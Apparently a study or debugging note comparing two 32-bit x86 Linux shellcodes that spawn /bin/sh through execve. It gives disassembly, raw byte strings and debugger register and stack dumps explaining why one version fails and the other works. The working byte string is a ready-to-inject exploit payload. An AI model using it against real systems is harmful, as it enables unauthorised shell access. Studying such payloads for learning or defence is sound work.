SHELLCODE_KO :

00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f
00000008  682F62696E        push dword 0x6e69622f
0000000D  89E3              mov ebx,esp
0000000F  50                push eax
00000010  53                push ebx
00000011  89E1              mov ecx,esp
00000013  B00B              mov al,0xb
00000015  CD80              int 0x80

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


=== at int 0x80 instruction :

eax            0xb
ebx            0xffffcdb8
ecx            0xffffcdb0
edx            0x41

x/6w $esp :

0xffffcdb0: 0xffffcdb8  0x00000000  0x6e69622f  0x68732f2f
0xffffcdc0: 0x00000000  0x00000000

=======================================================================================

SHELLCODE_OK :

00000000  31C9              xor ecx,ecx
00000002  F7E1              mul ecx
00000004  51                push ecx
00000005  682F2F7368        push dword 0x68732f2f
0000000A  682F62696E        push dword 0x6e69622f
0000000F  89E3              mov ebx,esp
00000011  B00B              mov al,0xb
00000013  CD80              int 0x80

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

=== at int 0x80 instruction :

eax            0xb
ebx            0xffffcdb8
ecx            0x0
edx            0x0

x/6w $esp :

0xffffcdb8: 0x6e69622f  0x68732f2f  0x00000000  0x00000000
0xffffcdc8: 0x00000044  0x00000004
